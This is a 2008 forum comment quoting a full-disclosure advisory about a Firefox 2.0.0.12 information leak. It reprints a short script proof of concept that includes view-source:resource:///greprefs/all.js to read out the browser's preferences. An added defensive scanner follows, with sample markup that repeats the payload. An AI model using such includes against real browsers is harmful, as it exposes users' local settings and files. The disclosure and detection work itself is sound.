Post: Firefox 2.0.0.12 is still vulnerable to directory traversal flaw!
Posted Saturday 9th February 2008 23:58 GMT
In Firefox updates, blitzes trio of critical bugs
Firefox 2.0.0.12 is still vulnerable to directory traversal:
"don't patch vulnerabilities for fifty percent, take the time and fix the cause. Because directory traversal through plugins is all nice and such, we don't need it. We can trick Firefox itself in traversing directories back. I found another information leak that is very serious because we are able to read out all preferences set in Firefox, or just open or include about every file stored in the Mozilla program files directory, and this without any mandatory settings or plugins."
http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060156.html
<script>
/*
@name: Firefox <= 2.0.0.12 information leak pOc
@date: Feb. 07 2008
@author: Ronald van den Heetkamp
@url: http://www.0x000000.com
*/
pref = function(a,b) {
    document.write( a + ' -> ' + b + '<br />');
};
</script>
<script src="view-source:resource:///greprefs/all.js">
</script>
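
A defensive check for the pattern in the proof of concept above, as an added example that is not part of the original post or the advisory: it scans HTML (for instance at a filtering proxy or in content review) and flags elements whose URL attribute points at a browser-internal scheme. The scheme list, the attribute list and the name `findInternalSchemeLoads` are assumptions for illustration, and the sample markup is constructed.

```javascript
// Schemes that ordinary web content should not load sub-resources from.
// Assumed list for illustration; resource: and view-source: are the two the PoC uses.
const INTERNAL_SCHEMES = ['resource', 'view-source', 'chrome', 'file', 'jar'];

// Decode character references that could be used to disguise a scheme name.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Return every leading scheme of a URL, so "view-source:resource:///x" yields both.
function schemesOf(url) {
  // Browsers drop tab/newline inside URLs and ignore leading control/space characters.
  let rest = decodeEntities(url).replace(/[\t\r\n]/g, '').replace(/^[\u0000-\u0020]+/, '');
  const found = [];
  let m;
  while ((m = /^([a-z][a-z0-9+.-]*):/i.exec(rest))) {
    found.push(m[1].toLowerCase());
    rest = rest.slice(m[0].length);
  }
  return found;
}

// Scan markup for URL-bearing attributes and report those using internal schemes.
function findInternalSchemeLoads(html) {
  const hits = [];
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  const attrRe = /\b(src|href|data|action)\s*=\s*("([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  for (const tag of html.matchAll(tagRe)) {
    for (const a of tag[2].matchAll(attrRe)) {
      const url = a[3] ?? a[4] ?? a[5] ?? '';
      const schemes = schemesOf(url).filter((s) => INTERNAL_SCHEMES.includes(s));
      if (schemes.length) hits.push({ tag: tag[1].toLowerCase(), attr: a[1].toLowerCase(), url, schemes });
    }
  }
  return hits;
}

// Constructed sample input: one benign script, the PoC's include, an entity-encoded
// variant, and a benign link that merely mentions "resource:" in its query string.
const SAMPLE = [
  '<script src="https://example.com/app.js"></script>',
  '<script src="view-source:resource:///greprefs/all.js"></script>',
  "<img src='&#114;esource:///x.png'>",
  '<a href="http://example.com/?q=resource:">ok</a>',
].join('\n');
console.log(findInternalSchemeLoads(SAMPLE));
```

This is a regex-based triage check over static markup, so it will not see URLs assembled by script at run time.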